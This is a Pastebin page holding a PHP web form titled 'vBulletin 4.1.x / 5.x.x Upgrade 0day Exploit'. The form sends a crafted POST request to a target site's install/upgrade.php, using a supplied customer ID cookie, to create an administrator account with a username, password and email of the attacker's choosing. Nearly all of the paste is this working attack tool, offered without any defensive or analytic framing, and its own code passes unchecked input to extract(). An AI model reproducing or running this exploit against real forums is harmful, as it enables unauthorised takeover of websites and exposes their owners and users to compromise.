API tools faq
paste
Guest User

CSRF vbulletin 0day

a guest
Aug 23rd, 2017
62
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.43 KB | None | 0 0
raw download clone embed print report
  1. <!DOCTYPE HTML>
  2.  
  3. <html>
  4. <title>vBulletin 0day Exploit!</title>
  5. <body bgcolor=#000000>
  6. <center>
  7. <pre><font color=#ffffff><link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700' rel='stylesheet' type='text/css'>
  8. <font face="Ubuntu Mono" size="5" color="#ffffff">vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit</font><br>
  9. <a href="https://www.facebook.com/gzinflate/" target="_blank">Me!</a>
  10. <br>
  11. <?php
  12. //extract data from the post
  13. if(isset($_POST['submit'])){
  14. extract($_POST);
  15.  
  16. //set POST variables
  17. $url = $_POST['url'];
  18. $fields = array(
  19. 'ajax' => urlencode('1'),
  20. 'version' => urlencode('install'),
  21. 'checktable' => urlencode('false'),
  22. 'firstrun' => urlencode('false'),
  23. 'step' => urlencode('7'),
  24. 'startat' => urlencode('0'),
  25. 'only' => urlencode('false'),
  26. 'customerid' => urlencode($_POST['customerid']),
  27. 'options[skiptemplatemerge]' => urlencode('0'),
  28. 'response' => urlencode('yes'),
  29. 'htmlsubmit' => urlencode('1'),
  30. 'htmldata[username]' => urlencode($_POST['username']),
  31. 'htmldata[password]' => urlencode($_POST['password']),
  32. 'htmldata[confirmpassword]' => urlencode($_POST['password']),
  33. 'htmldata[email]' => urlencode($_POST['email'])
  34. );
  35.  
  36. //url-ify the data for the POST
  37. foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
  38. rtrim($fields_string, '&');
  39.  
  40. //open connection
  41. $ch = curl_init();
  42.  
  43. //set the url, number of POST vars, POST data
  44. curl_setopt($ch,CURLOPT_URL, $url);
  45. curl_setopt($ch,CURLOPT_POST, count($fields));
  46. curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
  47. curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
  48. curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
  49.  
  50. //execute post
  51. $result = curl_exec($ch);
  52.  
  53. //close connection
  54. curl_close($ch);
  55. exit();
  56. }
  57. ?>
  58. <center>
  59. <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
  60. <span>Example: http://localhost/path/install/upgrade.php</span><br>
  61. <span>Website:</span><input name="url" type="text" tabindex="1" size="60" />
  62. <br><span>Customer ID:</span><input name="customerid" type="text" tabindex="2" size="40" />
  63. <br><span>Username:</span><input name="username" type="text" tabindex="3" size="40" />
  64. <br><span>Password:</span><input name="password" type="text" tabindex="4" size="40" />
  65. <br><span>Email:</span><input name="email" type="text" tabindex="5" maxlength="40" />
  66.  
  67. <input name="submit" type="submit" value="Inject Admin">
  68.  
  69. </form>
  70. </center>
  71. </pre>
  72. </font>
  73. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!